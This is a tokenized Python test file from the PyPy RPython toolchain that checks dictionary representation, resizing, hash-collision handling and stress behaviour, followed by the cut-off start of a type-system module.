<NUM_LIT:3> <EOL> def test_dict_inst_itervalues ( self ) : <EOL> class A : <EOL> pass <EOL> def func ( ) : <EOL> dic = { <NUM_LIT:1> : A ( ) , <NUM_LIT:2> : A ( ) } <EOL> a = <NUM_LIT:0> <EOL> for v in dic . itervalues ( ) : <EOL> a += isinstance ( v , A ) <EOL> return a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_inst_items ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A : <EOL> pass <EOL> class B ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { B ( ) : A ( ) , B ( ) : A ( ) } <EOL> items = dic . items ( ) <EOL> b = <NUM_LIT:0> <EOL> a = <NUM_LIT:0> <EOL> for k , v in items : <EOL> b += isinstance ( k , B ) <EOL> a += isinstance ( v , A ) <EOL> return <NUM_LIT:3> * b + a <EOL> res = self . 
interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:8> <EOL> def test_dict_inst_iteritems ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A : <EOL> pass <EOL> class B ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { B ( ) : A ( ) , B ( ) : A ( ) } <EOL> b = <NUM_LIT:0> <EOL> a = <NUM_LIT:0> <EOL> for k , v in dic . iteritems ( ) : <EOL> b += isinstance ( k , B ) <EOL> a += isinstance ( v , A ) <EOL> return <NUM_LIT:3> * b + a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:8> <EOL> def test_dict_items ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> items = dic . items ( ) <EOL> res = len ( items ) <EOL> for key , value in items : <EOL> res += ord ( key [ <NUM_LIT:1> ] ) - ord ( '<STR_LIT:0>' ) + value <EOL> return res <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_contains ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> return '<STR_LIT>' in dic and '<STR_LIT>' not in dic <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res is True <EOL> def test_dict_contains_with_constant_dict ( self ) : <EOL> dic = { '<STR_LIT:4>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> def func ( i ) : <EOL> return chr ( i ) in dic <EOL> res = self . interpret ( func , [ ord ( '<STR_LIT:4>' ) ] ) <EOL> assert res is True <EOL> res = self . interpret ( func , [ <NUM_LIT:1> ] ) <EOL> assert res is False <EOL> def test_dict_or_none ( self ) : <EOL> class A : <EOL> pass <EOL> def negate ( d ) : <EOL> return not d <EOL> def func ( n ) : <EOL> a = A ( ) <EOL> a . d = None <EOL> if n > <NUM_LIT:0> : <EOL> a . d = { str ( n ) : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } <EOL> del a . d [ "<STR_LIT>" ] <EOL> return negate ( a . d ) <EOL> res = self . 
interpret ( func , [ <NUM_LIT:10> ] ) <EOL> assert res is False <EOL> res = self . interpret ( func , [ <NUM_LIT:0> ] ) <EOL> assert res is True <EOL> res = self . interpret ( func , [ <NUM_LIT> ] ) <EOL> assert res is True <EOL> def test_int_dict ( self ) : <EOL> def func ( a , b ) : <EOL> dic = { <NUM_LIT:12> : <NUM_LIT> } <EOL> dic [ a ] = <NUM_LIT:1000> <EOL> return dic . get ( b , - <NUM_LIT> ) <EOL> res = self . interpret ( func , [ <NUM_LIT:12> , <NUM_LIT:12> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> res = self . interpret ( func , [ <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> assert res == - <NUM_LIT> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT:12> ] ) <EOL> assert res == <NUM_LIT> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert res == - <NUM_LIT> <EOL> def test_id_instances_keys ( self ) : <EOL> class A : <EOL> pass <EOL> class B ( A ) : <EOL> pass <EOL> def f ( ) : <EOL> a = A ( ) <EOL> b = B ( ) <EOL> d = { } <EOL> d [ b ] = <NUM_LIT:7> <EOL> d [ a ] = <NUM_LIT:3> <EOL> return len ( d ) + d [ a ] + d [ b ] <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:12> <EOL> def test_captured_get ( self ) : <EOL> get = { <NUM_LIT:1> : <NUM_LIT:2> } . get <EOL> def f ( ) : <EOL> return get ( <NUM_LIT:1> , <NUM_LIT:3> ) + get ( <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def g ( h ) : <EOL> return h ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> def f ( ) : <EOL> return g ( get ) <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_specific_obscure_bug ( self ) : <EOL> class A : pass <EOL> class B : pass <EOL> def f ( ) : <EOL> lst = [ A ( ) ] <EOL> res1 = A ( ) in lst <EOL> d2 = { B ( ) : None , B ( ) : None } <EOL> return res1 + len ( d2 ) <EOL> res = self . 
interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_type_erase ( self ) : <EOL> class A ( object ) : <EOL> pass <EOL> class B ( object ) : <EOL> pass <EOL> def f ( ) : <EOL> return { A ( ) : B ( ) } , { B ( ) : A ( ) } <EOL> t = TranslationContext ( ) <EOL> s = t . buildannotator ( ) . build_types ( f , [ ] ) <EOL> rtyper = t . buildrtyper ( ) <EOL> rtyper . specialize ( ) <EOL> s_AB_dic = s . items [ <NUM_LIT:0> ] <EOL> s_BA_dic = s . items [ <NUM_LIT:1> ] <EOL> r_AB_dic = rtyper . getrepr ( s_AB_dic ) <EOL> r_BA_dic = rtyper . getrepr ( s_AB_dic ) <EOL> assert r_AB_dic . lowleveltype == r_BA_dic . lowleveltype <EOL> def test_tuple_dict ( self ) : <EOL> def f ( i ) : <EOL> d = { } <EOL> d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , <NUM_LIT:2> ) ] = <NUM_LIT:4> <EOL> d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , <NUM_LIT:3> ) ] = <NUM_LIT:6> <EOL> return d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , i ) ] <EOL> res = self . interpret ( f , [ <NUM_LIT:2> ] ) <EOL> assert res == f ( <NUM_LIT:2> ) <EOL> def test_dict_of_dict ( self ) : <EOL> def f ( n ) : <EOL> d = { } <EOL> d [ <NUM_LIT:5> ] = d <EOL> d [ <NUM_LIT:6> ] = { } <EOL> return len ( d [ n ] ) <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT:2> <EOL> res = self . interpret ( f , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_access_in_try ( self ) : <EOL> def f ( d ) : <EOL> try : <EOL> return d [ <NUM_LIT:2> ] <EOL> except ZeroDivisionError : <EOL> return <NUM_LIT> <EOL> return - <NUM_LIT:1> <EOL> def g ( n ) : <EOL> d = { <NUM_LIT:1> : n , <NUM_LIT:2> : <NUM_LIT:2> * n } <EOL> return f ( d ) <EOL> res = self . 
interpret ( g , [ <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def test_access_in_try_set ( self ) : <EOL> def f ( d ) : <EOL> try : <EOL> d [ <NUM_LIT:2> ] = <NUM_LIT> <EOL> except ZeroDivisionError : <EOL> return <NUM_LIT> <EOL> return - <NUM_LIT:1> <EOL> def g ( n ) : <EOL> d = { <NUM_LIT:1> : n } <EOL> f ( d ) <EOL> return d [ <NUM_LIT:2> ] <EOL> res = self . interpret ( g , [ <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_r_dict ( self ) : <EOL> class FooError ( Exception ) : <EOL> pass <EOL> def myeq ( n , m ) : <EOL> return n == m <EOL> def myhash ( n ) : <EOL> if n < <NUM_LIT:0> : <EOL> raise FooError <EOL> return - n <EOL> def f ( n ) : <EOL> d = r_dict ( myeq , myhash ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> d [ i ] = i * i <EOL> try : <EOL> value1 = d [ n ] <EOL> except FooError : <EOL> value1 = <NUM_LIT> <EOL> try : <EOL> value2 = n in d <EOL> except FooError : <EOL> value2 = <NUM_LIT> <EOL> try : <EOL> value3 = d [ - n ] <EOL> except FooError : <EOL> value3 = <NUM_LIT> <EOL> try : <EOL> value4 = ( - n ) in d <EOL> except FooError : <EOL> value4 = <NUM_LIT> <EOL> return ( value1 * <NUM_LIT> + <EOL> value2 * <NUM_LIT> + <EOL> value3 * <NUM_LIT:100> + <EOL> value4 ) <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_resize_during_iteration ( self ) : <EOL> def func ( ) : <EOL> d = { <NUM_LIT:5> : <NUM_LIT:1> , <NUM_LIT:6> : <NUM_LIT:2> , <NUM_LIT:7> : <NUM_LIT:3> } <EOL> try : <EOL> for key , value in d . iteritems ( ) : <EOL> d [ key ^ <NUM_LIT:16> ] = value * <NUM_LIT:2> <EOL> except RuntimeError : <EOL> pass <EOL> total = <NUM_LIT:0> <EOL> for key in d : <EOL> total += key <EOL> return total <EOL> res = self . 
interpret ( func , [ ] ) <EOL> assert <NUM_LIT:5> + <NUM_LIT:6> + <NUM_LIT:7> <= res <= <NUM_LIT:5> + <NUM_LIT:6> + <NUM_LIT:7> + ( <NUM_LIT:5> ^ <NUM_LIT:16> ) + ( <NUM_LIT:6> ^ <NUM_LIT:16> ) + ( <NUM_LIT:7> ^ <NUM_LIT:16> ) <EOL> def test_change_during_iteration ( self ) : <EOL> def func ( ) : <EOL> d = { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } <EOL> for key in d : <EOL> d [ key ] = <NUM_LIT> <EOL> return d [ '<STR_LIT:a>' ] <EOL> assert self . interpret ( func , [ ] ) == <NUM_LIT> <EOL> def test_dict_of_floats ( self ) : <EOL> d = { <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> } <EOL> def fn ( f ) : <EOL> return d [ f ] <EOL> res = self . interpret ( fn , [ <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_of_r_uint ( self ) : <EOL> for r_t in [ r_uint , r_longlong , r_ulonglong ] : <EOL> d = { r_t ( <NUM_LIT:2> ) : <NUM_LIT:3> , r_t ( <NUM_LIT:4> ) : <NUM_LIT:5> } <EOL> def fn ( x , y ) : <EOL> d [ r_t ( x ) ] = <NUM_LIT> <EOL> return d [ r_t ( y ) ] <EOL> res = self . interpret ( fn , [ <NUM_LIT:4> , <NUM_LIT:2> ] ) <EOL> assert res == <NUM_LIT:3> <EOL> res = self . interpret ( fn , [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT> <EOL> class TestLLtype ( BaseTestRdict , LLRtypeMixin ) : <EOL> def test_dict_but_not_with_char_keys ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:h>' : i } <EOL> try : <EOL> return d [ '<STR_LIT:hello>' ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_deleted_entry_reusage_with_colliding_hashes ( self ) : <EOL> def lowlevelhash ( value ) : <EOL> p = rstr . mallocstr ( len ( value ) ) <EOL> for i in range ( len ( value ) ) : <EOL> p . chars [ i ] = value [ i ] <EOL> return rstr . LLHelpers . 
ll_strhash ( p ) <EOL> def func ( c1 , c2 ) : <EOL> c1 = chr ( c1 ) <EOL> c2 = chr ( c2 ) <EOL> d = { } <EOL> d [ c1 ] = <NUM_LIT:1> <EOL> d [ c2 ] = <NUM_LIT:2> <EOL> del d [ c1 ] <EOL> return d [ c2 ] <EOL> char_by_hash = { } <EOL> base = rdict . DICT_INITSIZE <EOL> for y in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> y = chr ( y ) <EOL> y_hash = lowlevelhash ( y ) % base <EOL> char_by_hash . setdefault ( y_hash , [ ] ) . append ( y ) <EOL> x , y = char_by_hash [ <NUM_LIT:0> ] [ : <NUM_LIT:2> ] <EOL> res = self . interpret ( func , [ ord ( x ) , ord ( y ) ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def func2 ( c1 , c2 ) : <EOL> c1 = chr ( c1 ) <EOL> c2 = chr ( c2 ) <EOL> d = { } <EOL> d [ c1 ] = <NUM_LIT:1> <EOL> d [ c2 ] = <NUM_LIT:2> <EOL> del d [ c1 ] <EOL> d [ c1 ] = <NUM_LIT:3> <EOL> return d <EOL> res = self . interpret ( func2 , [ ord ( x ) , ord ( y ) ] ) <EOL> for i in range ( len ( res . entries ) ) : <EOL> assert not ( res . entries . everused ( i ) and not res . entries . valid ( i ) ) <EOL> def func3 ( c0 , c1 , c2 , c3 , c4 , c5 , c6 , c7 ) : <EOL> d = { } <EOL> c0 = chr ( c0 ) ; d [ c0 ] = <NUM_LIT:1> ; del d [ c0 ] <EOL> c1 = chr ( c1 ) ; d [ c1 ] = <NUM_LIT:1> ; del d [ c1 ] <EOL> c2 = chr ( c2 ) ; d [ c2 ] = <NUM_LIT:1> ; del d [ c2 ] <EOL> c3 = chr ( c3 ) ; d [ c3 ] = <NUM_LIT:1> ; del d [ c3 ] <EOL> c4 = chr ( c4 ) ; d [ c4 ] = <NUM_LIT:1> ; del d [ c4 ] <EOL> c5 = chr ( c5 ) ; d [ c5 ] = <NUM_LIT:1> ; del d [ c5 ] <EOL> c6 = chr ( c6 ) ; d [ c6 ] = <NUM_LIT:1> ; del d [ c6 ] <EOL> c7 = chr ( c7 ) ; d [ c7 ] = <NUM_LIT:1> ; del d [ c7 ] <EOL> return d <EOL> if rdict . DICT_INITSIZE != <NUM_LIT:8> : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> res = self . interpret ( func3 , [ ord ( char_by_hash [ i ] [ <NUM_LIT:0> ] ) <EOL> for i in range ( rdict . DICT_INITSIZE ) ] ) <EOL> count_frees = <NUM_LIT:0> <EOL> for i in range ( len ( res . entries ) ) : <EOL> if not res . entries . 
everused ( i ) : <EOL> count_frees += <NUM_LIT:1> <EOL> assert count_frees >= <NUM_LIT:3> <EOL> def test_dict_resize ( self ) : <EOL> def func ( want_empty ) : <EOL> d = { } <EOL> for i in range ( rdict . DICT_INITSIZE ) : <EOL> d [ chr ( ord ( '<STR_LIT:a>' ) + i ) ] = i <EOL> if want_empty : <EOL> for i in range ( rdict . DICT_INITSIZE ) : <EOL> del d [ chr ( ord ( '<STR_LIT:a>' ) + i ) ] <EOL> return d <EOL> res = self . interpret ( func , [ <NUM_LIT:0> ] ) <EOL> assert len ( res . entries ) > rdict . DICT_INITSIZE <EOL> res = self . interpret ( func , [ <NUM_LIT:1> ] ) <EOL> assert len ( res . entries ) == rdict . DICT_INITSIZE <EOL> def test_dict_valid_resize ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> d [ str ( i ) ] = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> del d [ str ( i ) ] <EOL> res = <NUM_LIT:0> <EOL> self . interpret ( func , [ ] ) <EOL> def test_opt_nullkeymarker ( self ) : <EOL> def f ( ) : <EOL> d = { "<STR_LIT:hello>" : None } <EOL> d [ "<STR_LIT>" ] = None <EOL> return "<STR_LIT:hello>" in d , d <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res . item0 == True <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_nullvaluemarker ( self ) : <EOL> def f ( n ) : <EOL> d = { - <NUM_LIT:5> : "<STR_LIT>" } <EOL> d [ <NUM_LIT> ] = "<STR_LIT>" <EOL> return len ( d [ n ] ) , d <EOL> res = self . interpret ( f , [ - <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:4> <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . 
OF , '<STR_LIT>' ) <EOL> def test_opt_nonullmarker ( self ) : <EOL> class A : <EOL> pass <EOL> def f ( n ) : <EOL> if n > <NUM_LIT:5> : <EOL> a = A ( ) <EOL> else : <EOL> a = None <EOL> d = { a : - <NUM_LIT> } <EOL> d [ A ( ) ] = n + <NUM_LIT> <EOL> return d [ a ] , d <EOL> res = self . interpret ( f , [ - <NUM_LIT:5> ] ) <EOL> assert res . item0 == - <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> res = self . interpret ( f , [ <NUM_LIT:6> ] ) <EOL> assert res . item0 == - <NUM_LIT> <EOL> def test_opt_nonnegint_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : <NUM_LIT:12> } <EOL> d [ - <NUM_LIT> ] = <NUM_LIT> <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . item1 == <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_no_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : <NUM_LIT:12> } <EOL> d [ - <NUM_LIT> ] = - <NUM_LIT> <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . item1 == - <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_boolean_has_no_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : True } <EOL> d [ - <NUM_LIT> ] = True <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . 
item1 is True <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_multiple_identical_dicts ( self ) : <EOL> def f ( n ) : <EOL> s = "<STR_LIT:x>" * n <EOL> d1 = { s : <NUM_LIT:12> } <EOL> d2 = { s : <NUM_LIT> } <EOL> d3 = { s : <NUM_LIT> } <EOL> d1 [ "<STR_LIT:a>" ] = d2 [ s ] <EOL> d3 [ s ] += d1 [ "<STR_LIT:a>" ] <EOL> d2 [ "<STR_LIT>" ] = d3 [ s ] <EOL> return d2 [ "<STR_LIT>" ] , d1 , d2 , d3 <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT> <EOL> assert lltype . typeOf ( res . item1 ) == lltype . typeOf ( res . item2 ) <EOL> assert lltype . typeOf ( res . item1 ) == lltype . typeOf ( res . item3 ) <EOL> def test_prebuilt_list_of_addresses ( self ) : <EOL> from pypy . rpython . lltypesystem import llmemory <EOL> TP = lltype . Struct ( '<STR_LIT:x>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> a = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> b = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> c = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> a_a = llmemory . cast_ptr_to_adr ( a ) <EOL> a0 = llmemory . cast_ptr_to_adr ( a ) <EOL> assert a_a is not a0 <EOL> assert a_a == a0 <EOL> a_b = llmemory . cast_ptr_to_adr ( b ) <EOL> a_c = llmemory . cast_ptr_to_adr ( c ) <EOL> d = { a_a : <NUM_LIT:3> , a_b : <NUM_LIT:4> , a_c : <NUM_LIT:5> } <EOL> d [ a0 ] = <NUM_LIT:8> <EOL> def func ( i ) : <EOL> if i == <NUM_LIT:0> : <EOL> ptr = a <EOL> else : <EOL> ptr = b <EOL> return d [ llmemory . cast_ptr_to_adr ( ptr ) ] <EOL> py . test . raises ( TypeError , self . interpret , func , [ <NUM_LIT:0> ] ) <EOL> def test_dict_of_voidp ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> handle = lltype . nullptr ( rffi . VOIDP . TO ) <EOL> d [ - <NUM_LIT:1> ] = handle <EOL> return len ( d ) <EOL> assert self . 
interpret ( func , [ ] ) == <NUM_LIT:1> <EOL> from pypy . translator . c . test . test_genc import compile <EOL> f = compile ( func , [ ] ) <EOL> res = f ( ) <EOL> assert res == <NUM_LIT:1> <EOL> class TestOOtype ( BaseTestRdict , OORtypeMixin ) : <EOL> def test_recursive ( self ) : <EOL> def func ( i ) : <EOL> dic = { i : { } } <EOL> dic [ i ] = dic <EOL> return dic [ i ] <EOL> res = self . interpret ( func , [ <NUM_LIT:5> ] ) <EOL> assert res . ll_get ( <NUM_LIT:5> ) is res <EOL> class TestStress : <EOL> def test_stress ( self ) : <EOL> from pypy . annotation . dictdef import DictKey , DictValue <EOL> from pypy . annotation import model as annmodel <EOL> dictrepr = rdict . DictRepr ( None , rint . signed_repr , rint . signed_repr , <EOL> DictKey ( None , annmodel . SomeInteger ( ) ) , <EOL> DictValue ( None , annmodel . SomeInteger ( ) ) ) <EOL> dictrepr . setup ( ) <EOL> l_dict = rdict . ll_newdict ( dictrepr . DICT ) <EOL> referencetable = [ None ] * <NUM_LIT> <EOL> referencelength = <NUM_LIT:0> <EOL> value = <NUM_LIT:0> <EOL> def complete_check ( ) : <EOL> for n , refvalue in zip ( range ( len ( referencetable ) ) , referencetable ) : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , n ) <EOL> except KeyError : <EOL> assert refvalue is None <EOL> else : <EOL> assert gotvalue == refvalue <EOL> for x in not_really_random ( ) : <EOL> n = int ( x * <NUM_LIT> ) <EOL> op = repr ( x ) [ - <NUM_LIT:1> ] <EOL> if op <= '<STR_LIT:2>' and referencetable [ n ] is not None : <EOL> rdict . ll_dict_delitem ( l_dict , n ) <EOL> referencetable [ n ] = None <EOL> referencelength -= <NUM_LIT:1> <EOL> elif op <= '<STR_LIT>' : <EOL> rdict . ll_dict_setitem ( l_dict , n , value ) <EOL> if referencetable [ n ] is None : <EOL> referencelength += <NUM_LIT:1> <EOL> referencetable [ n ] = value <EOL> value += <NUM_LIT:1> <EOL> else : <EOL> try : <EOL> gotvalue = rdict . 
ll_dict_getitem ( l_dict , n ) <EOL> except KeyError : <EOL> assert referencetable [ n ] is None <EOL> else : <EOL> assert gotvalue == referencetable [ n ] <EOL> if <NUM_LIT> <= x <= <NUM_LIT> : <EOL> complete_check ( ) <EOL> print '<STR_LIT>' , referencelength <EOL> assert l_dict . num_items == referencelength <EOL> complete_check ( ) <EOL> def test_stress_2 ( self ) : <EOL> yield self . stress_combination , True , False <EOL> yield self . stress_combination , False , True <EOL> yield self . stress_combination , False , False <EOL> yield self . stress_combination , True , True <EOL> def stress_combination ( self , key_can_be_none , value_can_be_none ) : <EOL> from pypy . rpython . lltypesystem . rstr import string_repr <EOL> from pypy . annotation . dictdef import DictKey , DictValue <EOL> from pypy . annotation import model as annmodel <EOL> print <EOL> print "<STR_LIT>" % ( <EOL> key_can_be_none , value_can_be_none ) <EOL> class PseudoRTyper : <EOL> cache_dummy_values = { } <EOL> dictrepr = rdict . DictRepr ( PseudoRTyper ( ) , string_repr , string_repr , <EOL> DictKey ( None , annmodel . SomeString ( key_can_be_none ) ) , <EOL> DictValue ( None , annmodel . SomeString ( value_can_be_none ) ) ) <EOL> dictrepr . setup ( ) <EOL> print dictrepr . lowleveltype <EOL> for key , value in dictrepr . DICTENTRY . _adtmeths . items ( ) : <EOL> print '<STR_LIT>' % ( key , value ) <EOL> l_dict = rdict . ll_newdict ( dictrepr . DICT ) <EOL> referencetable = [ None ] * <NUM_LIT> <EOL> referencelength = <NUM_LIT:0> <EOL> values = not_really_random ( ) <EOL> keytable = [ string_repr . convert_const ( "<STR_LIT>" % n ) <EOL> for n in range ( len ( referencetable ) ) ] <EOL> def complete_check ( ) : <EOL> for n , refvalue in zip ( range ( len ( referencetable ) ) , referencetable ) : <EOL> try : <EOL> gotvalue = rdict . 
ll_dict_getitem ( l_dict , keytable [ n ] ) <EOL> except KeyError : <EOL> assert refvalue is None <EOL> else : <EOL> assert gotvalue == refvalue <EOL> for x in not_really_random ( ) : <EOL> n = int ( x * <NUM_LIT> ) <EOL> op = repr ( x ) [ - <NUM_LIT:1> ] <EOL> if op <= '<STR_LIT:2>' and referencetable [ n ] is not None : <EOL> rdict . ll_dict_delitem ( l_dict , keytable [ n ] ) <EOL> referencetable [ n ] = None <EOL> referencelength -= <NUM_LIT:1> <EOL> elif op <= '<STR_LIT>' : <EOL> ll_value = string_repr . convert_const ( str ( values . next ( ) ) ) <EOL> rdict . ll_dict_setitem ( l_dict , keytable [ n ] , ll_value ) <EOL> if referencetable [ n ] is None : <EOL> referencelength += <NUM_LIT:1> <EOL> referencetable [ n ] = ll_value <EOL> else : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , keytable [ n ] ) <EOL> except KeyError : <EOL> assert referencetable [ n ] is None <EOL> else : <EOL> assert gotvalue == referencetable [ n ] <EOL> if <NUM_LIT> <= x <= <NUM_LIT> : <EOL> complete_check ( ) <EOL> print '<STR_LIT>' , referencelength <EOL> assert l_dict . num_items == referencelength <EOL> complete_check ( ) </s>
<s> """<STR_LIT>""" <EOL> from pypy . tool . pairtype import extendabletype <EOL> from pypy . rpython . ootypesystem import ootype <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . error import TyperError <EOL> class TypeSystem ( object ) : <EOL> __metaclass__ = extendabletype <EOL> offers_exceptiondata = True <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> def load ( modname ) : <EOL> try : <EOL> return __import__ ( "<STR_LIT>" % ( self . name , modname ) , <EOL> None , None , [ '<STR_LIT>' ] ) <EOL> except ImportError : <EOL> return None <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> mod = load ( name ) <EOL> if mod is not None : <EOL> setattr ( self , name , mod ) <EOL> return mod <EOL> raise AttributeError ( name ) <EOL> def derefType ( self , T ) : <EOL> raise NotImplementedError ( ) <EOL> def deref ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def check_null ( self , repr , hop ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def null_callable ( self , T ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def getcallabletype ( self , ARGS , RESTYPE ) : <EOL> cls = self . callable_trait [ <NUM_LIT:0> ] <EOL> return cls ( ARGS , RESTYPE ) <EOL> def getcallable ( self , graph , getconcretetype = None ) : <EOL> """<STR_LIT>""" <EOL> if getconcretetype is None : <EOL> getconcretetype = self . getconcretetype <EOL> llinputs = [ getconcretetype ( v ) for v in graph . getargs ( ) ] <EOL> lloutput = getconcretetype ( graph . getreturnvar ( ) ) <EOL> typ , constr = self . callable_trait <EOL> FT = typ ( llinputs , lloutput ) <EOL> name = graph . name <EOL> if hasattr ( graph , '<STR_LIT>' ) and callable ( graph . func ) : <EOL> if hasattr ( graph . 
